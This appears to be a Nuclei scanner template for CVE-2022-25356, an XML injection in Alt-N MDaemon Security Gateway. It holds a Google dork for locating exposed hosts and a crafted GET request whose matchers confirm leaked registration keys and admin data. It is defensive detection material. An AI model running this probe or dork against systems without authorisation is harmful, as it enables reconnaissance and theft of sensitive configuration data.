42 lines
1.3 KiB
YAML
42 lines
1.3 KiB
YAML
id: CVE-2022-25356
|
|
|
|
info:
|
|
name: Alt-N MDaemon Security Gateway - XML Injection
|
|
author: Akincibor
|
|
severity: medium
|
|
description: |
|
|
In Alt-n Security Gateway product, a malicious actor could inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. In this way the XML parser fails the validation process disclosing information such as kind of protection used (2FA), admin email and product registration keys.
|
|
reference:
|
|
- https://www.swascan.com/security-advisory-alt-n-security-gateway/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-25356
|
|
- https://www.altn.com/Products/SecurityGateway-Email-Firewall/
|
|
- https://www.swascan.com/security-blog/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2022-25356
|
|
cwe-id: CWE-91
|
|
metadata:
|
|
google-dork: inurl:"/SecurityGateway.dll"
|
|
verified: "true"
|
|
tags: cve,cve2022,altn,gateway,xml,injection
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Exception: Error while [Loading XML"
|
|
- "<RegKey>"
|
|
- "<IsAdmin>"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|